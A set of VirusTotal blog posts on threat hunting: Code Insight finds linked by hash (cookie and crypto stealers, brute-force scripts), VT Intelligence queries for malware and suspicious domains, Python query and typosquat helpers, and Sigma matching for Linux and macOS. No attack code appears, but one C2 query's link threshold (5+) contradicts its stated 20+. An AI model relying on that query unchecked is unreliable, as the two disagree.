<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdm1bIaVEsrm3YCrkWqXpiDQ0rRRStAQ6m2puBgBZq3pInQ2o_x3jeQ7eKnJYXJT96qe_dyWyfVvFJVv41plIChMPZ8daAArCpBioooFzGNK9vZjl8ujm1_y2owb7jXq6NrAQePrPmouWehB4HE5XZfMnuTbeOmiCW292ILQ9Mz5VblJ6NyigJKMKjYV0/s1600/DJI.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="1400" data-original-width="1414" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdm1bIaVEsrm3YCrkWqXpiDQ0rRRStAQ6m2puBgBZq3pInQ2o_x3jeQ7eKnJYXJT96qe_dyWyfVvFJVv41plIChMPZ8daAArCpBioooFzGNK9vZjl8ujm1_y2owb7jXq6NrAQePrPmouWehB4HE5XZfMnuTbeOmiCW292ILQ9Mz5VblJ6NyigJKMKjYV0/s1600/DJI.png"/></a></div>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<a href="https://www.virustotal.com/gui/file/eb252a56cdfe3c66ba45b4a87863d0dafb18dce49ea42bcbb766e769dbba9e6e/detection" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">eb252a56cdfe3c66ba45b4a87863d0dafb18dce49ea42bcbb766e769dbba9e6e</span></span></a></p>
</center>
<p>As the previous examples demonstrate, locating interesting samples through the “codeinsight:” operator is remarkably easy. This is largely due to the fact that the searches are conducted within the natural language reports generated by AI, which analyze the code and functionality of files. This approach significantly simplifies the task of finding relevant cybersecurity threats. </p>
<p>Next, we'll present more intriguing cases that have been detected using Code Insight, further showcasing its effectiveness in the cybersecurity landscape:</p>
<p><b>Stealing cryptocurrency by replacing addresses from the clipboard</b></p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT6KAU7phEgWsJslfl9u8zYL5LABHqA7tuWnyzbk4oRN4EDKfTHYZK8ZR3tnJQ4y6YS-l5lLFFIm64rPY02gKS-KLFYN7-MZhwsdr7GbUcCsVhEkCAwyk6nTUJcu77rEtKrMOztNaGHXcsFaS0fyE0DJDLdg1Yjb_2SUM8i3BujC3vBCgD6z7-HhkG1tM/s1600/cripto.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="1052" data-original-width="1665" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT6KAU7phEgWsJslfl9u8zYL5LABHqA7tuWnyzbk4oRN4EDKfTHYZK8ZR3tnJQ4y6YS-l5lLFFIm64rPY02gKS-KLFYN7-MZhwsdr7GbUcCsVhEkCAwyk6nTUJcu77rEtKrMOztNaGHXcsFaS0fyE0DJDLdg1Yjb_2SUM8i3BujC3vBCgD6z7-HhkG1tM/s1600/cripto.png"/></a></div>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<a href="https://www.virustotal.com/gui/file/0cf3a43dca5fdb2df9fd6743c8ecac228c1b27823ad0134fc92f384c6b497245/detection" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">0cf3a43dca5fdb2df9fd6743c8ecac228c1b27823ad0134fc92f384c6b497245</span></span></a></p>
</center>
<p><b>Script that automates the process of logging into the Medtronic CareLink Network</b></p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV9HHKEjp8p6mx6aH6vQD_0d2T0gzPZ9wJZQpefr7bUfh0KEa3bFmpK4jizxDX_Z-sBYMZjme40123LyJAITv5SGtGf8uZL1hOjT5OTiBBunR5f-b_My7ZJ7t0Ej-UFio9knSmPJJNCt0Ycb6OSOAuwOMCPlkNHMhqeRgRKABkBkJznCLFB-hXHpe72NI/s1600/medtronic.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="1052" data-original-width="1665" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV9HHKEjp8p6mx6aH6vQD_0d2T0gzPZ9wJZQpefr7bUfh0KEa3bFmpK4jizxDX_Z-sBYMZjme40123LyJAITv5SGtGf8uZL1hOjT5OTiBBunR5f-b_My7ZJ7t0Ej-UFio9knSmPJJNCt0Ycb6OSOAuwOMCPlkNHMhqeRgRKABkBkJznCLFB-hXHpe72NI/s1600/medtronic.png"/></a></div>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<a href="https://www.virustotal.com/gui/file/56742933e6384a2911a4f27ab14c927941ece836f34e5fa7699caf17f4a1dd72/detection" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">56742933e6384a2911a4f27ab14c927941ece836f34e5fa7699caf17f4a1dd72</span></span></a></p>
</center>
<p><b>Script that steals WhatsApp session cookies</b></p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifEXDdJxJU27jnEmlsddtw0nrtirJqHl0qcTuZAPuPBeIh8WUQmjNcYuWeX6N77mntId1irEtjLO5-ykYdXPnUytdpcbNisuB4QFSsT4JVcjAV0cb23p8N56hvgZ0R83s8wb1HFejtU8IUl5aWFxL23sP8M9pIiYoZuBTdXY7JbE1FYzq0wg-tPF-ZyJw/s1600/whatsapp.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="560" data-original-width="1377" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifEXDdJxJU27jnEmlsddtw0nrtirJqHl0qcTuZAPuPBeIh8WUQmjNcYuWeX6N77mntId1irEtjLO5-ykYdXPnUytdpcbNisuB4QFSsT4JVcjAV0cb23p8N56hvgZ0R83s8wb1HFejtU8IUl5aWFxL23sP8M9pIiYoZuBTdXY7JbE1FYzq0wg-tPF-ZyJw/s1600/whatsapp.png"/></a></div>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<a href="https://www.virustotal.com/gui/file/4d128460d2426ba0a47dfe70b3d54ee6e9d331c7889bef61974b3fd5af0e38c3/detection" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">4d128460d2426ba0a47dfe70b3d54ee6e9d331c7889bef61974b3fd5af0e38c3</span></span></a></p>
</center>
<p>More examples:</p>
<ul>
<li><a href="https://www.virustotal.com/gui/file/03387893f1e30c0ccec9919830941059cb796ff4b6e772d825105e37cc42cd78/detection">Script to increase the number of views on a TikTok video</a></li>
<li><a href="https://www.virustotal.com/gui/file/5058f7b5491292915818ecbfabb82dbe3337ff68588b8825a21bd8584d1cc27e/detection">Dictionary Attack on Netflix Accounts</a></li>
<li><a href="https://www.virustotal.com/gui/file/7e24f3171eb20b7ec056fb8bde67b4bfd3e79fafa9383ac6a1498bbfc337dc65/detection">Tinder bot</a></li>
<li><a href="https://www.virustotal.com/gui/file/67d951f13328acf139ea5d814e3cba97e22f3d4279e60a142832e7cffc7d545b/detection">Brute-Force Attack on Instagram Accounts</a></li>
<li><a href="https://www.virustotal.com/gui/file/6b58b1ec57cada88c6aad0de890ee3ed901cb76066bc6e6c073e65952b77d6da/detection">Phishing Message Script for Tesla Customers</a></li>
<li><a href="https://www.virustotal.com/gui/file/a63b90695709875b8721c9498b09e8fd0b94bf187df602048c562383bdcec06e/detection">Brute-Force Bitcoin private key generator</a></li>
</ul>
<p>These are just a few examples of how Code Insight can augment our threat intelligence processes and assist in identifying new targeted threats. We encourage you to try it in your investigations, experiencing its capabilities in enhancing your cybersecurity efforts. Stay tuned, as we will soon announce new features for Code Insight. Until then, happy hunting!</p>
<div class="interval_12">Author: <a href="http://www.blogger.com/profile/17288490159411812678" target="_blank">Bernardo Quintero</a></div>
<h2 style="text-align: left;">Monitoring malware trends with VT Intelligence</h2>
<div class="interval_12">Published 2024-01-01.</div>
<div class="interval_12">Please note that this blogpost is part of our #VTMondays series; check out our collection of past publications <a href="https://blog.virustotal.com/2023/12/vtmondays-index.html" target="_blank">here</a>.</div>
<div class="interval_12"><a href="https://www.virustotal.com/gui/home/search" target="_blank">VT Intelligence</a> can be a powerful tool for monitoring malware trends, enhancing your detection capabilities and enabling proactive defense against evolving threats. To leverage it effectively, analysts can refine searches with threat indicators relevant to their business, technologies and to the malware trends occurring at the moment. Analysts can use this intelligence to identify and hunt emerging malicious samples and investigate new trends and capabilities. </div>
<br />
<div class="interval_12">To begin with a simple query, we will search for files <b>(“entity:file”)</b> first seen during the last week <b>(“fs:7d+”)</b>, detected by AV vendors as a keylogger <b>(“engines:keylogger”)</b> and with more than 5 positives <b>(“p:5+”)</b>.</div>
<div class="my-yara-code interval_12" style="text-align: center;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520engines%253Akeylogger%2520p%253A5%252B%2520fs%253A7d%252B/files" target="_blank">entity:file engines:keylogger p:5+ fs:7d+</a></div>
<br />
<div class="interval_12">In our second query we search for fresh <b>(“fs:7d+”)</b> Windows, Linux or macOS files <b>(“type:peexe or type:elf or type:macho”)</b> with more than 10 positives <b>(“p:10+”)</b>. To focus on popular or emerging malware, we use the submissions modifier with a relatively high value <b>(“submissions:10+”)</b>. These thresholds are illustrative and can be adjusted according to the investigation.</div>
<div class="my-yara-code interval_12" style="text-align: center;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520p%253A10%252B%2520(type%253Apeexe%2520or%2520type%253Aelf%2520or%2520type%253Amacho)%2520fs%253A7d%252B%2520submissions%253A10%252B/files" target="_blank">entity:file p:10+ (type:peexe or type:elf or type:macho) fs:7d+ submissions:10+</a></div>
<br />
<div class="interval_12">Finally, we will look for Zip files <b>(“type:zip”)</b> that potentially contain ransomware. To filter on AV engine verdicts we use the <b>“engines”</b> keyword <b>(“engines:ransom or engines:ransomware”)</b> with both the <b>“ransom”</b> and <b>“ransomware”</b> strings, since engines follow different naming criteria in their verdicts. An alternative way of detecting ransomware is through dedicated crowdsourced YARA rules <b>(“crowdsourced_yara_rule:ransomware”)</b>.</div>
<div class="my-yara-code interval_12" style="text-align: center;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520type%253Azip%2520fs%253A7d%252B%2520(engines%253Aransom%2520or%2520engines%253Aransomware%2520or%2520crowdsourced_yara_rule%253Aransomware)/files" target="_blank">entity:file type:zip fs:7d+ (engines:ransom or engines:ransomware or crowdsourced_yara_rule:ransomware)</a></div>
<br />
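<div class="interval_12">The three queries above, and the <b>codeinsight:</b> searches in the Code Insight post, are modifier:value terms joined by spaces or <b>AND</b>, with OR-groups in parentheses; the GUI links to them carry the query percent-encoded twice. The following Python helper is an added example, not VirusTotal's own code: it composes those queries from thresholds you can tune for an investigation and reproduces the GUI links exactly as they appear in this post. The modifier names and the double encoding are taken from the queries and links on this page; the function names are our own.</div>

```python
"""Compose VT Intelligence search queries and the GUI links for them.

Added example (not VirusTotal's own code). Modifier names come from the
queries on this page; the double URL-encoding is inferred from the GUI
links on this page (':' -> '%253A', ' ' -> '%2520', '+' -> '%252B').
"""
from urllib.parse import quote

GUI_SEARCH = "https://www.virustotal.com/gui/search/"


def term(modifier, value):
    """Render one modifier:value term; values containing whitespace are
    double-quoted, e.g. codeinsight:"Murder Mystery 2"."""
    value = str(value)
    if any(ch.isspace() for ch in value):
        value = f'"{value}"'
    return f"{modifier}:{value}"


def at_least(modifier, count):
    """Count threshold such as p:5+ or submissions:10+."""
    return f"{modifier}:{int(count)}+"


def within_days(modifier, days):
    """Relative date such as fs:7d+ (first seen within the last 7 days)."""
    return f"{modifier}:{int(days)}d+"


def any_of(*terms):
    """OR-group, e.g. (type:peexe or type:elf or type:macho)."""
    return "(" + " or ".join(terms) + ")"


def build_query(*terms, explicit_and=False):
    """Join terms: adjacent terms are ANDed, either implicitly (a space,
    as in the queries above) or with an explicit AND (codeinsight examples)."""
    return (" AND " if explicit_and else " ").join(terms)


def gui_search_url(query, entity_path="files"):
    """Turn a query into the link form used by the VirusTotal GUI.

    The query is percent-encoded twice and parentheses are left literal,
    which is how the links on this page are built.
    """
    encoded = quote(quote(query, safe="()"), safe="()")
    return f"{GUI_SEARCH}{encoded}/{entity_path}"


# The three queries of this post, with their thresholds as parameters.

def keylogger_query(days=7, min_positives=5):
    return build_query(term("entity", "file"), term("engines", "keylogger"),
                       at_least("p", min_positives), within_days("fs", days))


def popular_executables_query(days=7, min_positives=10, min_submissions=10):
    return build_query(term("entity", "file"), at_least("p", min_positives),
                       any_of(term("type", "peexe"), term("type", "elf"),
                              term("type", "macho")),
                       within_days("fs", days),
                       at_least("submissions", min_submissions))


def ransomware_zip_query(days=7):
    return build_query(term("entity", "file"), term("type", "zip"),
                       within_days("fs", days),
                       any_of(term("engines", "ransom"),
                              term("engines", "ransomware"),
                              term("crowdsourced_yara_rule", "ransomware")))


def code_insight_query(*keywords):
    """codeinsight:... AND codeinsight:... as in the Code Insight post."""
    return build_query(*(term("codeinsight", k) for k in keywords),
                       explicit_and=True)


if __name__ == "__main__":
    for q in (keylogger_query(), popular_executables_query(),
              ransomware_zip_query(),
              code_insight_query("Roblox", "Murder Mystery 2", "cheat")):
        print(q)
        print("  ", gui_search_url(q))
```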
<div class="interval_12">You can learn more about file search modifiers in the <a href="https://docs.virustotal.com/docs/file-search-modifiers" target="_blank">documentation</a>. </div>
<div class="interval_12"> As always, we would like to <a href="http://virustotal.com/contact" target="_blank">hear from you</a>. </div>
<div class="interval_12"> Happy hunting! </div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
.my-yara-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: #F7F9F9;
color: Black;
/*padding: 24px;*/
border-collapse: collapse;
text-align: center;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
mark.dark-blue {
color:Blue;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_10 {
width: 10%;
}
.width_15 {
width: 15%;
}
.width_20 {
width: 20%;
}
.width_30 {
width: 30%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_90 {
width: 90%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>
Raimundo Alcázar (http://www.blogger.com/profile/13300156415377228655)
Published 2023-12-25T12:30:00.003+01:00, updated 2023-12-25T12:30:00.139+01:00
<h2 style="text-align: left;">Hunting for malicious domains with VT Intelligence</h2>
<div class="interval_12">Please note that this blogpost is part of our #VTMondays series; check out our collection of past publications <a href="https://blog.virustotal.com/2023/12/vtmondays-index.html" target="_blank">here</a>.</div>
<div class="interval_12">Many cyberattacks begin with victims visiting compromised websites that host malware or phishing pages; threat actors use domains for a variety of malicious purposes as part of their infrastructure, and malware communicates with external hosts for command and control and exfiltration. Detecting suspicious domains and feeding them preemptively into corporate security controls can disrupt attacks before they happen, and <a href="https://www.virustotal.com/gui/home/search" target="_blank">VT Intelligence</a> is well suited both to detecting them early and to monitoring how malicious campaigns evolve. </div>
<br />
<div class="interval_12">Let’s start by searching for domains <b>(“entity:domain”)</b> that use self-signed certificates <b>(“tag:self-signed”)</b>. Such certificates raise some suspicion because nothing about them has been verified: anyone can create and issue a certificate for any domain, which makes it easier for malicious actors to impersonate legitimate websites. We will look for domains created no more than a week ago <b>(“creation_date:7d+”)</b> according to their whois information. Finally, we want domains with at least 5 detections to reduce false positives, although this threshold is entirely at your discretion.</div>
<div class="my-yara-code interval_12" style="text-align: center;"><a href="https://www.virustotal.com/gui/search/entity%253Adomain%2520tag%253Aself-signed%2520creation_date%253A7d%252B%2520p%253A5%252B/domains" target="_blank">entity:domain tag:self-signed creation_date:7d+ p:5+</a></div>
<br />
<div class="interval_12">Moving to the next stage, let’s look for C2 domains <b>(“category:command and control”)</b>. Malware periodically contacts C2 servers to receive instructions, which is why any connection to them originating from our network is worth investigating. We use the <b>(“lm:7d+”)</b> modifier to restrict results to domains updated in VT during the last week, and the <b>(“detected_communicating_files_count:20+”)</b> modifier to keep only domains that at least 20 detected files in VirusTotal have been observed contacting during sandbox detonation; the <b>(“p:5+”)</b> detection threshold from the previous query stays in place.
</div>
<div class="my-yara-code interval_12" style="text-align: center;"><a href="https://www.virustotal.com/gui/search/entity%253Adomain%2520p%253A5%252B%2520category%253A%2522command%2520and%2520control%2522%2520detected_communicating_files_count%253A5%252B%2520lm%253A7d%252B/domains" target="_blank">entity:domain p:5+ category:"command and control" detected_communicating_files_count:20+ lm:7d+</a></div>
<br />
<div class="interval_12">Finally, we will hunt for typosquatted domains <b>(“fuzzy_domain:fedex.com”)</b> that impersonate a given legitimate one; in this example we use Fedex. In addition, we search for any suspicious domain containing "fedex" as a substring, a trick attackers commonly use to confuse victims. The domain modifier <b>(“domain:fedex”)</b> matches domains containing this word as a substring, and the depth modifier <b>(“depth:5-”)</b> bounds how many subdomain levels are included in the search. This depth would still find subdomains of the form “<i>fedex.aaa.bbb.ccc.ddd.com</i>”, where the word fedex could appear in any of the labels. We narrow the results down to domains with at least 5 detections <b>(“p:5+”)</b> to reduce noise from false positives.
</div>
<div class="my-yara-code interval_12" style="text-align: center;"><a href="https://www.virustotal.com/gui/search/entity%253Adomain%2520(fuzzy_domain%253Afedex.com%2520or%2520domain%253Afedex%2520and%2520depth%253A5-)%2520p%253A5%252B/domains" target="_blank">entity:domain (fuzzy_domain:fedex.com or domain:fedex and depth:5-) p:5+</a></div>
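<div class="interval_12">The three ideas behind that last query (edit-distance lookalikes, a brand substring, and a bound on subdomain depth) can be reproduced locally to pre-screen a candidate list before it is sent to VT Intelligence. The Python below is an added example written for this post, not VirusTotal code; the edit-distance threshold, the "last two labels" rule for the registrable domain, and the reading of depth as the number of dots (so that fedex.aaa.bbb.ccc.ddd.com has depth 5, as in the post's example) are assumptions, and the candidate domains are constructed.</div>

```python
# Added example (not from the VirusTotal post): an offline pre-filter that mirrors
# the three branches of the post's FedEx query -- fuzzy_domain (edit distance),
# domain:fedex (brand substring) and depth:5- (subdomain depth bound) -- so a
# constructed list of candidates can be triaged before spending VT quota on it.

from dataclasses import dataclass
from typing import List

TARGET = "fedex.com"      # the legitimate brand domain being protected
MAX_EDIT_DISTANCE = 2     # assumption: how far a lookalike may drift from TARGET
MAX_DEPTH = 5             # assumption: depth = number of dots, so the post's
                          # "fedex.aaa.bbb.ccc.ddd.com" has depth 5


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert/delete/substitute), O(len(a)*len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (ca != cb)))   # substitution
        prev = cur
    return prev[-1]


def registrable_part(domain: str) -> str:
    """Assumption: the last two labels form the registrable domain (fine for .com)."""
    return ".".join(domain.lower().strip(".").split(".")[-2:])


def domain_depth(domain: str) -> int:
    """Number of dots; the post's 'fedex.aaa.bbb.ccc.ddd.com' gives 5."""
    return domain.strip(".").count(".")


@dataclass(frozen=True)
class Verdict:
    domain: str
    reason: str   # "fuzzy", "substring", or "" when the domain is not flagged


def classify(domain: str, target: str = TARGET) -> Verdict:
    """Apply the two branches of the query in the same order the query lists them."""
    d = domain.lower().strip(".")
    brand = target.split(".")[0]
    if d == target:
        return Verdict(domain, "")   # the legitimate domain itself is never flagged
    # fuzzy_domain analogue: registrable part within edit distance of the target
    if levenshtein(registrable_part(d), target) <= MAX_EDIT_DISTANCE:
        return Verdict(domain, "fuzzy")
    # "domain:fedex and depth:5-" analogue: brand anywhere in the name, bounded depth
    if brand in d and domain_depth(d) <= MAX_DEPTH:
        return Verdict(domain, "substring")
    return Verdict(domain, "")


def triage(domains: List[str]) -> List[Verdict]:
    """Return only the flagged candidates, preserving input order."""
    return [v for v in (classify(x) for x in domains) if v.reason]


# Constructed candidate list (not real VT results).
CANDIDATES = [
    "fedex.com",                        # legitimate, must not be flagged
    "fedx.com",                         # one deletion away: fuzzy
    "fed3x.com",                        # one substitution away: fuzzy
    "fedex.aaa.bbb.ccc.ddd.com",        # the post's depth-5 example: substring
    "fedex.a.b.c.d.e.com",              # depth 6, outside the bound: not flagged
    "secure-fedex-login.example.net",   # brand inside a label: substring
    "example.org",                      # unrelated: not flagged
]

if __name__ == "__main__":
    for v in triage(CANDIDATES):
        print(f"{v.reason:9s} {v.domain}")
```

<div class="interval_12">It runs offline and returns the flagged domains in input order together with the reason, which is the same split the query makes between its fuzzy_domain branch and its domain:fedex and depth:5- branch.</div>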
<br />
<div class="interval_12">You can learn more about domain search modifiers in the <a href="https://docs.virustotal.com/docs/domain-search-modifiers" target="_blank">documentation</a>. </div>
<div class="interval_12"> As always, we would like to <a href="http://virustotal.com/contact" target="_blank">hear from you</a>. </div>
<div class="interval_12"> Happy hunting! </div>
Raimundo Alcázar (http://www.blogger.com/profile/13300156415377228655)
Published 2023-12-20T13:07:00.002+01:00, updated 2024-03-05T11:40:41.647+01:00
<h2 style="text-align: left;">Sigma rules for Linux and MacOS</h2>
<div class="interval_12"> <b>TLDR</b>: VT Crowdsourced Sigma rules will now also match suspicious activity for macOS and Linux binaries, in addition to Windows.
</div>
<div class="interval_12"> We recently <a href="https://blog.virustotal.com/2023/06/threat-hunting-converting-sigma-to-yara.html" target="_blank">discussed</a> how to maximize the value of Sigma rules by easily converting them to YARA Livehunts. Unfortunately, at that time Sigma rules were only matched against Windows binaries.
</div>
<div class="interval_12"> Since then, our engineering team has worked hard to give Sigma lovers a better experience, increasing the value of Crowdsourced Sigma rules by extending matches to macOS and Linux samples.
</div>
<h2 style="text-align: left;">Welcome macOS and Linux</h2>
<div class="interval_12"> Although we are still working on implementing Sysmon in our Linux and macOS sandboxes, we have added features that allow Sigma rule matching based on the runtime behavior extracted from samples.
</div>
<div class="interval_12"> For example, a process created in our sandbox whose image path ends in <mark class="my-yara-code"><mark class="red">“/crontab”</mark></mark> and whose command line contains the <mark class="my-yara-code"><mark class="red">"-l"</mark></mark> parameter would match the following Sigma rule:
</div>
<div class="my-yara-code interval_12" style="text-align: left;">
<p>logsource:</p>
<p>&nbsp;&nbsp;product: linux</p>
<p>&nbsp;&nbsp;category: process_creation</p>
<p>detection:</p>
<p>&nbsp;&nbsp;selection:</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;Image|endswith: '/crontab'</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;CommandLine|contains: ' -l'</p>
<p>&nbsp;&nbsp;condition: selection</p>
</div>
<div class="interval_12"> We have mapped all the fields used by Sigma rules onto the information offered by our sandboxes, which allowed us to support rules for the image_load, process_creation and registry_set categories, among others.
</div>
<div class="interval_12"> This approach has limitations. However, about 54% of Crowdsourced Sigma rules for Linux and 96% of those for macOS concern process creation, so our sandboxes’ output already contains enough information to match all of them. The same holds for rules based on file creation.
</div>
<div class="interval_12"> Let’s look at some examples!
</div>
<h2 style="text-align: left;">Linux, MacOS and Windows examples</h2>
<div class="interval_12"> The following <a href="https://www.virustotal.com/gui/file/fa9586039889b460ca92820d33cb85e410f225e55fe04f021a940735693e5a8a/details" target="_blank">shell script sample</a> has 11 Crowdsourced Sigma rule matches.
</div>
<div class="central_img width_90 interval_12" style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/bTWJ1UA1ZZD4Rp1zveMMQnBj56Ml4m7CNrtWH5WhtyHoHeZ_jQDszTLVAzzMceuWMx6Ca8KuBfZohKHmbBvL4GXs54q5Ioh3BB8S_fpZBraBPB3hTZnQkjwbC6VDTaAjuKQTsaxIlY47PwEq0ShTu6a8UL3Z-JRQbkf4-cXBMvv1LGHiWc57ouscO9y4SK0PZdj0CqzFqZnbvLlZDlNUoKWYoV7KioE16SOr7w" width="800" /></div>
<div class="interval_12"> For every rule, it is possible to check what triggered the match by clicking on "View matches”. For Windows binaries, it shows which Sysmon event matched the behavior described in the Sigma rule, as we can see below:
</div>
<div class="central_img width_90 interval_12" style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/nH37fyOS9lB4SH9qzIPAK1yTKLJbS-MCJi7qeWjswE9dhWkogvY5br3uA-J2yPoDF9KYFgupIoA5k5YrG9ZzWwhNIdadZHk-xwJZg_zTUM7DTqeA6nqwMtg2o4sGnL38ZkzhB3Pd8MFf8BI-xN5oTQ0Ol-yMAtkww-xEPK5drozKGfysVmADlLUOuUwer9oGtl0gqz7c-mZXTbez9Rt492v3fTJADgURaO6ydg" width="800" /></div>
<div class="interval_12"> For the shell script mentioned above, it shows the values that are relevant to the rule’s logic, as in the following image:
</div>
<div class="central_img width_90 interval_12" style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/iBVwMpjLAzwLYgV7s-PHZfaTDmuE2ISh-lBEGrLFcFgNIpQ7-f3B2vm4a8R_cEWM5Uax6v3xWT35reZbqurLjx90n-8asI2l1Pxdp41-xEFj0H3Sz99dHzJYtH6kgd54Gw3NvrKWr2UGCI588Ou4QpCZL5VGJnV5q1SddyyPRK6cPezRfFFCB6DVVT7HsB3xrc_FoRkickpOYVcO5F6z-oO6xHemiuSPM5p-eg" width="800" /></div>
<div class="interval_12"> Interestingly, Sigma rules intended for Linux also produce results in macOS environments, and vice versa: in this case, the shell script can be interpreted by both operating systems. Indeed, one of the rules matching the sample, <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml" target="_blank">Indicator Removal on Host - Clear Mac System Logs</a>, was specifically created for macOS:
</div>
<div class="central_img width_90 interval_12" style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/IU3OM1Nz14k8Pdkaqpi5RWHGc9NjWAHoPKGCL90esa0QZMQb1ZhWqRTDqnVd6vJgCvNpso8PHNQJT2hwmjOrhJRCencqP93ABVfLas7udwAnUCx7gH-svk8LICqcHhZDhodxd5PyVL-oEcAOCx8j40JYMU8d4Iq7Pe-mUh_3IvxIcm20_ChTS7294F-GdclSfNPL19773yuw75SEvOXRruSBYi6NuHMvCtlW3g" width="800" /></div>
<div class="interval_12"> while a second matching rule, <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml" target="_blank">Commands to Clear or Remove the Syslog</a>, was created for Linux:
</div>
<div class="central_img width_90 interval_12" style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/I83iS3D0wpyQu8TFf0n4dlf153RAfdvIRl8iMWb-sm1NMY8t3P8wwJ3Ixr2rO8gmzAaYHdz7hXuUsRDGzxi_UYuD6OFu3pKsXMXe8KbbDeaAL0tBWfDgcGICAE-irxXsdNRR9kkLDsWsSaXx-5tcdallNMpmYuc-m1GZbAQ4j6-vDPK9wp0Q9ga_Xs7iILRPWqKPzgQv8Q4DoPlLhf274anMMSi3YngwDPbx2w" width="800" /></div>
<div class="interval_12"> To find more samples whose Sigma matches come from sandbox output rather than from Sysmon, you can use the following queries:
</div>
<div class="my-yara-code interval_12">(<mark class="red">have</mark>:sigma) and not <mark class="red">have</mark>:evtx <mark class="red">type</mark>:mac</div>
<div class="my-yara-code interval_12">(<mark class="red">have</mark>:sigma) and not <mark class="red">have</mark>:evtx <mark class="red">type</mark>:linux</div>
<div class="interval_12"> A second <a href="https://www.virustotal.com/gui/file/41231183ec32f6cc4313f30cef8b0a29d0df205ea81242ce3f7bfebcf4a58fa3" target="_blank">interesting example</a> is a DMG matching 8 Sigma rules: 5 of them were originally created for Linux under the “process_creation” category and 2 were created for macOS. The last match… is a Sigma rule created for Windows samples!
</div>
<div class="central_img width_90 interval_12" style="text-align: center;"><img height="152" src="https://s5.gifyu.com/images/Sjbsg.gif" width="800" /></div>
<div class="interval_12"> Matching Sigma rules against Linux and macOS samples also helped us identify some rules that may be too generic, which is not necessarily a problem as long as that is the intended behavior.
</div>
